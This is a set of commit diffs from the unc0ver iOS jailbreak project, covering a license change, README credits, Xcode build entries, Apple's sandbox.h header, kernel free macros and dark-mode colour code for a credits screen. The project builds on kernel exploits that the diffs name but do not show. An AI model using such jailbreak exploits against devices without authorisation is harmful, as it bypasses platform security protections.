Update README.md

New UI Implemented

remove unnecessary xcode ref

*passes torch*

Clean up

LICENSE

@@ -1,21 +1,29 @@
-MIT License
+BSD 3-Clause License
 
-Copyright (c) 2018 Pwn20wnd
+Copyright (c) 2019, Pwn20wnd
+All rights reserved.
 
-Permission is hereby granted, free of charge, to any person obtaining a copy
-of this software and associated documentation files (the "Software"), to deal
-in the Software without restriction, including without limitation the rights
-to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-copies of the Software, and to permit persons to whom the Software is
-furnished to do so, subject to the following conditions:
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
 
-The above copyright notice and this permission notice shall be included in all
-copies or substantial portions of the Software.
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.
 
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-SOFTWARE.
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its
+   contributors may be used to endorse or promote products derived from
+   this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

README.md

@@ -2,9 +2,9 @@
 ### The most advanced jailbreak tool
 ![unc0ver logo](https://github.com/pwn20wndstuff/Undecimus/raw/master/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60%403x.png)
 
-unc0ver jailbreak for iOS 11.0 - 12.1.2<br/>
+unc0ver jailbreak for iOS 11.0 - 12.2<br/>
 by [@pwn20wnd](https://twitter.com/Pwn20wnd) & [@sbingner](https://twitter.com/sbingner)<br/>
-UI by [@DennisBednarz](https://twitter.com/DennisBednarz) & [Samg_is_a_Ninja](https://reddit.com/u/Samg_is_a_Ninja)<br/>
+UI by [@iOS_App_Dev](https://twitter.com/iOS_App_Dev) & [@HiMyNameIsUbik](https://twitter.com/HiMyNameIsUbik)<br/>
 
 ## The most outstanding changes over the other jailbreaks
 * One app to jailbreak all firmwares
@@ -58,15 +58,14 @@ UI by [@DennisBednarz](https://twitter.com/DennisBednarz) & [Samg_is_a_Ninja](ht
 * [@i41nbeer](https://twitter.com/i41nbeer) for mach_portal, triple_fetch, async_wake, empty_list, multi_path and deja_xnu
 * [@bazad](https://twitter.com/bazad) for voucher_swap and PAC bypass
 * [@Morpheus______](https://twitter.com/Morpheus______) for the QiLin Toolkit (No longer used)
-* [@xerub](https://twitter.com/xerub) for libjb and the original patchfinder64
-* [@iBSparkes](https://twitter.com/iBSparkes) for the original amfid_payload (No longer used), jailbreakd (No longer used), pspawn_hook (No longer used), machswap and machswap2
+* [@xerub](https://twitter.com/xerub) for the original patchfinder64
+* [@iBSparkes](https://twitter.com/iBSparkes) for the machswap and machswap2
 * [@stek29](https://twitter.com/stek29) for the patchfinder64 additions, unlocknvram, host_get_special_port(4) patch and shenanigans bypass
 * [@theninjaprawn](https://twitter.com/theninjaprawn) for the patchfinder64 additions
 * [@saurik](https://twitter.com/saurik) for Cydia and Substrate
 * [@FCE365](https://twitter.com/FCE365) for the empty_list reliability improvements
-* [@tihmstar](https://twitter.com/tihmstar) for libgrabkernel (No longer used), liboffsetfinder64 (No longer used), v1ntex (No longer used) and v3ntex (No longer used)
-* Credits for [Undecimus-Resources](https://github.com/pwn20wndstuff/Undecimus-Resources)
-* [@coolstarorg](https://twitter.com/coolstarorg) for originally testing the snapshot rename idea on corellium
+* [Samg_is_a_ninja](https://reddit.com/u/Samg_is_a_Ninja) for original UI development
+* [@DennisBednarz](https://twitter.com/DennisBednarz) for original UI design
 * [@Cryptiiiic](https://twitter.com/Cryptiiiic) for testing
 * [@xanDesign_](https://twitter.com/xanDesign_) for testing
 * [@AppleDry05](https://twitter.com/AppleDry05) for testing

Undecimus.xcodeproj/project.pbxproj

@@ -24,6 +24,7 @@
 		2150A9E022021348001C8677 /* parameters.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9D922021348001C8677 /* parameters.c */; };
 		2150A9E122021348001C8677 /* kernel_alloc.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9DA22021348001C8677 /* kernel_alloc.c */; };
 		2150A9E222021348001C8677 /* kernel_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9DB22021348001C8677 /* kernel_memory.c */; };
+		2163BE2122A1DB4700518DD9 /* libsandbox.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 2163BE2022A1DB4700518DD9 /* libsandbox.tbd */; };
 		216F3F3D2228776E007DC1BC /* kernel_call.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F362228776D007DC1BC /* kernel_call.c */; };
 		216F3F3E2228776E007DC1BC /* user_client.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F372228776D007DC1BC /* user_client.c */; };
 		216F3F3F2228776E007DC1BC /* pac.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F3A2228776D007DC1BC /* pac.c */; };
@@ -64,6 +65,9 @@
 		22CFED9221CDFE6B00A216BE /* libmis.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 22CFED9121CDFE6B00A216BE /* libmis.tbd */; };
 		22F91CDB21E02CF300B2FCAE /* inject.m in Sources */ = {isa = PBXBuildFile; fileRef = 22F91CD921E02CF200B2FCAE /* inject.m */; };
 		22F91CE321E033A500B2FCAE /* libsnappy.c in Sources */ = {isa = PBXBuildFile; fileRef = 22F91CE221E033A500B2FCAE /* libsnappy.c */; };
+		51435081229E2F0C00446FBA /* Settings-Light.png in Resources */ = {isa = PBXBuildFile; fileRef = 51435080229E2F0C00446FBA /* Settings-Light.png */; };
+		51F1DB24229ED54400B81A6F /* DarkMode-Dark.png in Resources */ = {isa = PBXBuildFile; fileRef = 51F1DB22229ED54300B81A6F /* DarkMode-Dark.png */; };
+		51F1DB25229ED54400B81A6F /* Settings-Dark.png in Resources */ = {isa = PBXBuildFile; fileRef = 51F1DB23229ED54400B81A6F /* Settings-Dark.png */; };
 		8D592A68218E47F60035D2BC /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 8D592A67218E47F60035D2BC /* Main.storyboard */; };
 /* End PBXBuildFile section */
 
@@ -109,6 +113,8 @@
 		2150A9E322021381001C8677 /* mach_vm.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mach_vm.h; sourceTree = "<group>"; };
 		2150A9E422021381001C8677 /* ipc_port.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ipc_port.h; sourceTree = "<group>"; };
 		2150A9E52202138A001C8677 /* IOKitLib.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOKitLib.h; sourceTree = "<group>"; };
+		2163BE1F22A1DB2400518DD9 /* sandbox.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = sandbox.h; sourceTree = "<group>"; };
+		2163BE2022A1DB4700518DD9 /* libsandbox.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = libsandbox.tbd; path = usr/lib/libsandbox.tbd; sourceTree = SDKROOT; };
 		216F3F352228776D007DC1BC /* user_client.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = user_client.h; sourceTree = "<group>"; };
 		216F3F362228776D007DC1BC /* kernel_call.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kernel_call.c; sourceTree = "<group>"; };
 		216F3F372228776D007DC1BC /* user_client.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = user_client.c; sourceTree = "<group>"; };
@@ -161,7 +167,6 @@
 		21C130EA214C03690021AA9D /* CreditsTableViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = CreditsTableViewController.m; sourceTree = "<group>"; };
 		21C13117214D268F0021AA9D /* multi_path_sploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = multi_path_sploit.c; sourceTree = "<group>"; };
 		21C13118214D268F0021AA9D /* multi_path_sploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = multi_path_sploit.h; sourceTree = "<group>"; };
-		21C1312E214D5A710021AA9D /* multi_path.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = multi_path.entitlements; sourceTree = "<group>"; };
 		21CC3901227CDFDE0072D572 /* prefs.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = prefs.h; sourceTree = "<group>"; };
 		21CC3902227CDFDE0072D572 /* prefs.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = prefs.m; sourceTree = "<group>"; };
 		21CC3903227CDFDE0072D572 /* diagnostics.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = diagnostics.m; sourceTree = "<group>"; };
@@ -190,6 +195,14 @@
 		22F91CDA21E02CF300B2FCAE /* inject.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = inject.h; path = Injector/inject.h; sourceTree = SOURCE_ROOT; };
 		22F91CDE21E02EB000B2FCAE /* snappy.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = snappy.h; path = snappy/snappy.h; sourceTree = SOURCE_ROOT; };
 		22F91CE221E033A500B2FCAE /* libsnappy.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; name = libsnappy.c; path = snappy/libsnappy.c; sourceTree = SOURCE_ROOT; };
+		51435080229E2F0C00446FBA /* Settings-Light.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "Settings-Light.png"; sourceTree = "<group>"; };
+		51F1DB22229ED54300B81A6F /* DarkMode-Dark.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "DarkMode-Dark.png"; sourceTree = "<group>"; };
+		51F1DB23229ED54400B81A6F /* Settings-Dark.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "Settings-Dark.png"; sourceTree = "<group>"; };
+		51F1DB26229F2AD200B81A6F /* RobotoMono-Regular.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = "RobotoMono-Regular.ttf"; sourceTree = "<group>"; };
+		51F1DB27229F2BC700B81A6F /* RobotoMono-Bold.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = "RobotoMono-Bold.ttf"; sourceTree = "<group>"; };
+		51F1DB28229F31C400B81A6F /* DarkMode-Light.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "DarkMode-Light.png"; sourceTree = "<group>"; };
+		51F1DB29229F31D300B81A6F /* DarkMode-Light.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; name = "DarkMode-Light.png"; path = "../../../../DarkMode-Light.png"; sourceTree = "<group>"; };
+		51F1DB2A229F325700B81A6F /* multi_path.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = multi_path.entitlements; sourceTree = "<group>"; };
 		8D592A67218E47F60035D2BC /* Main.storyboard */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = file.storyboard; path = Main.storyboard; sourceTree = "<group>"; };
 /* End PBXFileReference section */
 
@@ -198,6 +211,7 @@
 			isa = PBXFrameworksBuildPhase;
 			buildActionMask = 2147483647;
 			files = (
+				2163BE2122A1DB4700518DD9 /* libsandbox.tbd in Frameworks */,
 				21B421902261302F004C17CD /* MobileCoreServices.framework in Frameworks */,
 				2171C4012222E3BB004E45C7 /* SystemConfiguration.framework in Frameworks */,
 				216FDA1E220C5F5C0086D802 /* libz.tbd in Frameworks */,
@@ -316,6 +330,7 @@
 		21675B62214A68B700D20E2B /* Frameworks */ = {
 			isa = PBXGroup;
 			children = (
+				2163BE2022A1DB4700518DD9 /* libsandbox.tbd */,
 				21B4218F2261302F004C17CD /* MobileCoreServices.framework */,
 				2171C4002222E3BB004E45C7 /* SystemConfiguration.framework */,
 				216FDA1D220C5F5C0086D802 /* libz.tbd */,
@@ -344,6 +359,7 @@
 		2170BD3421B192750059BD10 /* include */ = {
 			isa = PBXGroup;
 			children = (
+				2163BE1F22A1DB2400518DD9 /* sandbox.h */,
 				219BF90422832DBC00A4B827 /* UIProgressHUD.h */,
 				2150A9E322021381001C8677 /* mach_vm.h */,
 				2150A9E422021381001C8677 /* ipc_port.h */,
@@ -365,6 +381,13 @@
 			isa = PBXGroup;
 			children = (
 				21FED6A42168DB460024BC95 /* Painting_With_Chocolate.ttf */,
+				51F1DB26229F2AD200B81A6F /* RobotoMono-Regular.ttf */,
+				51F1DB27229F2BC700B81A6F /* RobotoMono-Bold.ttf */,
+				51F1DB28229F31C400B81A6F /* DarkMode-Light.png */,
+				51F1DB22229ED54300B81A6F /* DarkMode-Dark.png */,
+				51F1DB23229ED54400B81A6F /* Settings-Dark.png */,
+				51435080229E2F0C00446FBA /* Settings-Light.png */,
+				51F1DB29229F31D300B81A6F /* DarkMode-Light.png */,
 			);
 			path = resources;
 			sourceTree = "<group>";
@@ -468,10 +491,10 @@
 				2170BD3621B192B90059BD10 /* resources */,
 				2170BD3421B192750059BD10 /* include */,
 				8D592A67218E47F60035D2BC /* Main.storyboard */,
+				51F1DB2A229F325700B81A6F /* multi_path.entitlements */,
 				21C0FC7321369EB800849420 /* Assets.xcassets */,
 				21C0FC7521369EB800849420 /* LaunchScreen.storyboard */,
 				21C0FC7821369EB800849420 /* Info.plist */,
-				21C1312E214D5A710021AA9D /* multi_path.entitlements */,
 			);
 			path = Undecimus;
 			sourceTree = "<group>";
@@ -584,7 +607,10 @@
 			isa = PBXResourcesBuildPhase;
 			buildActionMask = 2147483647;
 			files = (
+				51F1DB25229ED54400B81A6F /* Settings-Dark.png in Resources */,
+				51435081229E2F0C00446FBA /* Settings-Light.png in Resources */,
 				21C0FC7721369EB800849420 /* LaunchScreen.storyboard in Resources */,
+				51F1DB24229ED54400B81A6F /* DarkMode-Dark.png in Resources */,
 				8D592A68218E47F60035D2BC /* Main.storyboard in Resources */,
 				21C0FC7421369EB800849420 /* Assets.xcassets in Resources */,
 			);

Undecimus/include/common.h

@@ -8,7 +8,6 @@
 #ifdef __OBJC__
 #include <Foundation/Foundation.h>
 #define RAWLOG(str, args...) do { NSLog(@str, ##args); } while(false)
-#define localize(x) NSLocalizedString(x, @"")
 #define ADDRSTRING(val) [NSString stringWithFormat:@ADDR, val]
 #else
 #include <CoreFoundation/CoreFoundation.h>
@@ -27,6 +26,8 @@ extern void NSLog(CFStringRef, ...);
 #define CFSafeReleaseNULL(x) do { CFSafeRelease(x); (x) = NULL; } while(false)
 #define SafeSFree(x) do { if (KERN_POINTER_VALID(x)) sfree(x); } while(false)
 #define SafeSFreeNULL(x) do { SafeSFree(x); (x) = KPTR_NULL; } while(false)
+#define SafeIOFree(x, size) do { if (KERN_POINTER_VALID(x)) IOFree(x, size); } while(false)
+#define SafeIOFreeNULL(x, size) do { SafeIOFree(x, size); (x) = KPTR_NULL; } while(false)
 
 #define kCFCoreFoundationVersionNumber_iOS_12_0 1535.12
 #define kCFCoreFoundationVersionNumber_iOS_11_3 1452.23

Undecimus/include/sandbox.h

@@ -0,0 +1,181 @@
+/*
+ * Copyright (c) 2006-2010 Apple Inc. All rights reserved.
+ *
+ * @APPLE_LICENSE_HEADER_START@
+ * 
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this
+ * file.
+ * 
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ * 
+ * @APPLE_LICENSE_HEADER_END@
+ */
+#ifndef _SANDBOX_H_
+#define _SANDBOX_H_
+
+#include <sys/cdefs.h>
+#include <stdint.h>
+#include <unistd.h>
+
+__BEGIN_DECLS
+/*
+ * @function sandbox_init
+ * Places the current process in a sandbox with a profile as
+ * specified.  If the process is already in a sandbox, the new profile
+ * is ignored and sandbox_init() returns an error.
+ *
+ * @param profile (input)   The Sandbox profile to be used.  The format
+ * and meaning of this parameter is modified by the `flags' parameter.
+ *
+ * @param flags (input)   Must be SANDBOX_NAMED.  All other
+ * values are reserved.
+ *
+ * @param errorbuf (output)   In the event of an error, sandbox_init
+ * will set `*errorbuf' to a pointer to a NUL-terminated string
+ * describing the error. This string may contain embedded newlines.
+ * This error information is suitable for developers and is not
+ * intended for end users.
+ *
+ * If there are no errors, `*errorbuf' will be set to NULL.  The
+ * buffer `*errorbuf' should be deallocated with `sandbox_free_error'.
+ *
+ * @result 0 on success, -1 otherwise.
+ */
+int sandbox_init(const char *profile, uint64_t flags, char **errorbuf);
+
+/*
+ * @define SANDBOX_NAMED  The `profile' argument specifies a Sandbox
+ * profile named by one of the kSBXProfile* string constants.
+ */
+#define SANDBOX_NAMED		0x0001
+
+#ifdef __APPLE_API_PRIVATE
+
+/* The following flags are reserved for Mac OS X.  Developers should not
+ * depend on their availability.
+ */
+
+/*
+ * @define SANDBOX_NAMED_BUILTIN   The `profile' argument specifies the
+ * name of a builtin profile that is statically compiled into the
+ * system.
+ */
+#define SANDBOX_NAMED_BUILTIN	0x0002
+
+/*
+ * @define SANDBOX_NAMED_EXTERNAL   The `profile' argument specifies the
+ * pathname of a Sandbox profile.  The pathname may be abbreviated: If
+ * the name does not start with a `/' it is treated as relative to
+ * /usr/share/sandbox and a `.sb' suffix is appended.
+ */
+#define SANDBOX_NAMED_EXTERNAL	0x0003
+
+/*
+ * @define SANDBOX_NAMED_MASK   Mask for name types: 4 bits, 15 possible
+ * name types, 3 currently defined.
+ */
+#define SANDBOX_NAMED_MASK	0x000f
+
+#endif /* __APPLE_API_PRIVATE */
+
+/*
+ * Available Sandbox profiles.
+ */
+
+/* TCP/IP networking is prohibited. */
+extern const char kSBXProfileNoInternet[];
+
+/* All sockets-based networking is prohibited. */
+extern const char kSBXProfileNoNetwork[];
+
+/* File system writes are prohibited. */
+extern const char kSBXProfileNoWrite[];
+
+/* File system writes are restricted to temporary folders /var/tmp and
+ * confstr(_CS_DARWIN_USER_DIR, ...).
+ */
+extern const char kSBXProfileNoWriteExceptTemporary[];
+
+/* All operating system services are prohibited. */
+extern const char kSBXProfilePureComputation[];
+
+/*
+ * @function sandbox_free_error
+ * Deallocates an error string previously allocated by sandbox_init.
+ *
+ * @param errorbuf (input)   The buffer to be freed.  Must be a pointer
+ * previously returned by sandbox_init in the `errorbuf' argument, or NULL.
+ *
+ * @result void
+ */
+void sandbox_free_error(char *errorbuf);
+
+
+#ifdef __APPLE_API_PRIVATE
+
+/* The following definitions are reserved for Mac OS X.  Developers should not
+ * depend on their availability.
+ */
+
+int sandbox_init_with_parameters(const char *profile, uint64_t flags, const char *const parameters[], char **errorbuf);
+
+int sandbox_init_with_extensions(const char *profile, uint64_t flags, const char *const extensions[], char **errorbuf);
+
+enum sandbox_filter_type {
+	SANDBOX_FILTER_NONE,
+	SANDBOX_FILTER_PATH,
+	SANDBOX_FILTER_GLOBAL_NAME,
+	SANDBOX_FILTER_LOCAL_NAME,
+	SANDBOX_FILTER_APPLEEVENT_DESTINATION,
+	SANDBOX_FILTER_RIGHT_NAME,
+};
+
+extern const enum sandbox_filter_type SANDBOX_CHECK_NO_REPORT __attribute__((weak_import));
+
+enum sandbox_extension_flags {
+	FS_EXT_DEFAULTS =              0,
+	FS_EXT_FOR_PATH =       (1 << 0),
+	FS_EXT_FOR_FILE =       (1 << 1),
+	FS_EXT_READ =           (1 << 2),
+	FS_EXT_WRITE =          (1 << 3),
+	FS_EXT_PREFER_FILEID =  (1 << 4),
+};
+
+int sandbox_check(pid_t pid, const char *operation, enum sandbox_filter_type type, ...);
+
+int sandbox_note(const char *note);
+
+int sandbox_suspend(pid_t pid);
+int sandbox_unsuspend(void);
+
+int sandbox_issue_extension(const char *path, char **ext_token);
+int sandbox_issue_fs_extension(const char *path, uint64_t flags, char **ext_token);
+int sandbox_issue_fs_rw_extension(const char *path, char **ext_token);
+int sandbox_issue_mach_extension(const char *name, char **ext_token);
+
+int sandbox_consume_extension(const char *path, const char *ext_token);
+int sandbox_consume_fs_extension(const char *ext_token, char **path);
+int sandbox_consume_mach_extension(const char *ext_token, char **name);
+
+int sandbox_release_fs_extension(const char *ext_token);
+
+int sandbox_container_path_for_pid(pid_t pid, char *buffer, size_t bufsize);
+
+int sandbox_wakeup_daemon(char **errorbuf);
+
+const char *_amkrtemp(const char *);
+
+#endif /* __APPLE_API_PRIVATE */
+
+__END_DECLS
+#endif /* _SANDBOX_H_ */

Undecimus/source/CreditsTableViewController.h

@@ -12,4 +12,32 @@
 
 + (NSURL *)getURLForUserName:(NSString *)userName;
 
+@property (weak, nonatomic) IBOutlet UIButton *ianBeerButton;
+@property (weak, nonatomic) IBOutlet UIButton *bazadButton;
+@property (weak, nonatomic) IBOutlet UIButton *morpheusButton;
+@property (weak, nonatomic) IBOutlet UIButton *xerubButton;
+@property (weak, nonatomic) IBOutlet UIButton *psychoTeaButton;
+@property (weak, nonatomic) IBOutlet UIButton *stekButton;
+@property (weak, nonatomic) IBOutlet UIButton *ninjaPrawnButton;
+@property (weak, nonatomic) IBOutlet UIButton *crypticButton;
+@property (weak, nonatomic) IBOutlet UIButton *xerusDesignButton;
+@property (weak, nonatomic) IBOutlet UIButton *appleDryButton;
+@property (weak, nonatomic) IBOutlet UIButton *robButton;
+@property (weak, nonatomic) IBOutlet UIButton *midnightChipButton;
+@property (weak, nonatomic) IBOutlet UIButton *geoSn0wButton;
+@property (weak, nonatomic) IBOutlet UIButton *swaggoButton;
+@property (weak, nonatomic) IBOutlet UIButton *jailbreakbusterButton;
+@property (weak, nonatomic) IBOutlet UIButton *jakeashacksButton;
+@property (weak, nonatomic) IBOutlet UIButton *saurikButton;
+@property (weak, nonatomic) IBOutlet UIButton *siguzaButton;
+@property (weak, nonatomic) IBOutlet UIButton *externalistButton;
+@property (weak, nonatomic) IBOutlet UIButton *realBrightiupButton;
+@property (weak, nonatomic) IBOutlet UIButton *nitoTVButton;
+@property (weak, nonatomic) IBOutlet UIButton *matchsticButton;
+@property (weak, nonatomic) IBOutlet UIButton *umanghereButton;
+@property (weak, nonatomic) IBOutlet UIButton *miscMistyButton;
+@property (weak, nonatomic) IBOutlet UIButton *benButton;
+@property (weak, nonatomic) IBOutlet UIButton *samGButton;
+@property (weak, nonatomic) IBOutlet UIButton *dennisButton;
+
 @end

Undecimus/source/CreditsTableViewController.m

@@ -16,15 +16,8 @@
 
 - (void)viewDidLoad {
     [super viewDidLoad];
-    UIImageView *myImageView = [[UIImageView alloc] initWithImage:[UIImage imageNamed:@"Clouds"]];
-    [myImageView setContentMode:UIViewContentModeScaleAspectFill];
-    [myImageView setFrame:self.tableView.frame];
-    UIView *myView = [[UIView alloc] initWithFrame:myImageView.frame];
-    [myView setBackgroundColor:[UIColor whiteColor]];
-    [myView setAlpha:0.84];
-    [myView setAutoresizingMask:UIViewAutoresizingFlexibleWidth | UIViewAutoresizingFlexibleHeight];
-    [myImageView addSubview:myView];
-    [self.tableView setBackgroundView:myImageView];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(darkModeCreditsView:) name:@"darkModeCredits" object:nil];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(lightModeCreditsView:) name:@"lightModeCredits" object:nil];
 }
 
 - (void)didReceiveMemoryWarning {
@@ -32,6 +25,68 @@
     // Dispose of any resources that can be recreated.
 }
 
+-(void) darkModeCreditsView:(NSNotification *) notification  {
+    
+    [self.ianBeerButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.bazadButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.morpheusButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.xerubButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.psychoTeaButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.stekButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.ninjaPrawnButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.crypticButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.xerusDesignButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.appleDryButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.robButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.midnightChipButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.geoSn0wButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.swaggoButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.jailbreakbusterButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.jakeashacksButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.saurikButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.siguzaButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.externalistButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.realBrightiupButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.nitoTVButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.matchsticButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.umanghereButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.miscMistyButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.benButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.samGButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.dennisButton setTitleColor:[UIColor whiteColor] forState:normal];
+}
+
+-(void) lightModeCreditsView:(NSNotification *) notification  {
+    
+    [self.ianBeerButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.bazadButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.morpheusButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.xerubButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.psychoTeaButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.stekButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.ninjaPrawnButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.crypticButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.xerusDesignButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.appleDryButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.robButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.midnightChipButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.geoSn0wButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.swaggoButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.jailbreakbusterButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.jakeashacksButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.saurikButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.siguzaButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.externalistButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.realBrightiupButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.nitoTVButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.matchsticButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.umanghereButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.miscMistyButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.benButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.samGButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.dennisButton setTitleColor:[UIColor blackColor] forState:normal];
+}
+
 + (NSURL *)getURLForUserName:(NSString *)userName {
     if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"tweetbot://"]]) {
